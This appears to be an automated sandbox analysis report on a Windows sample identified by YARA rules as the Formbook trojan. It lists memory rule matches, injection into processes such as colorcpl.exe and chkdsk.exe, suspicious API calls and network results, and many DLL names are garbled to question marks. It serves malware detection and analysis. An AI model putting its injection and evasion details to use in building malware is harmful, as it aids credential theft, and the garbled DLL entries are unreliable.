              Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 30 Nov 2023 13:58:44 GMT | Content-Type: text/html | Content-Length: 291 | Connection: close | ETag: "6552b21e-123" | Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
              Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Thu, 30 Nov 2023 13:59:05 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: Yara match | File source: Process Memory Space: Fpopgapwdcgvxn.exe PID: 2268, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_032EF158 GetMessagePos,GetKeyboardState
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_032D4F94 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette

              E-Banking Fraud

              Source: Yara match | File source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: Fpopgapwdcgvxn.exe PID: 2268, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
              Source: Process Memory Space: colorcpl.exe PID: 5112, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR; Matched rule: Semi-Auto-generated - file ironshell.php.txt; Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
              Source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
              Source: Process Memory Space: colorcpl.exe PID: 6928, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
              Source: Process Memory Space: chkdsk.exe PID: 6856, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
              Source: C:\Users\Public\Libraries\Telragab.PIF; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 2180
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe; Code function: 0_3_026A48A5
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe; Code function: 0_2_032B2160
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe; Code function: 0_2_032FC520
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe; Code function: 0_2_032E3E18
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe; Code function: 0_2_032BDD17
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_068B9E4C
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_068B9E50
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_068B2FB0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_068CE757
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_068B2D90
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_068B1030
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E649EB0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FFF09
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E603FD2
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E603FD5
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FFFB1
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6B9C32
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FFCF2
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F7D73
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E65FDC0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6B3A6C
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FFA49
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F7A46
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6EDAC6
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6DDAAC
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E685AA0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6E1AA3
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FFB76
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6B5BF0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E67DBF9
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E65FB80
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6AD800
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6438E0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E649950
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E65B950
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E685630
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F16CC
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FF7B0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E631460
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FF43F
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F7571
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6DD5B0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6E12ED
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E65B2C0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6452A0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E62D34C
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F132D
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E68739A
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F70E9
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FF0E0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6EF0CC
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6470C0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E67516C
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E62F172
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E70B16B
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E64B1B0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E640E59
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FEE26
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FEEDB
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E652E90
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FCE93
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6B4F40
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E682F28
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E660F30
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6E2F30
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E64CFE0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E632FC8
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6BEFA0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E640C00
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E630CF2
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6E0CB5
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E64AD00
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6DCD1F
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E63ADE0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E658DBF
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E63EA80
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FAB40
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F6BD7
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E64A840
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E642840
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E66E8F0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6268B8
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E656962
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6429A0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E70A9A6
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E65C6E0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E640770
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E664750
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E63C7C0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F2446
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6E4420
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6EE4F6
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E640535
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E700591
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6E0274
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6C02C0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6FA352
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E64E3F0
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E7003E6
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6D2000
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6C8158
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E630100
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6DA118
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F81CC
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E6F41A2
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 3_2_1E7001AA
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe; Code function: 0_2_0330CB08 InetIsOffline, CoInitialize, CoUninitialize, WinExec, CreateProcessAsUserW, NtQueueApcThread, ResumeThread, CloseHandle, CopyFileA, GetCurrentProcess, ExitProcess
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ?????.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??????s.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ???r????i.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
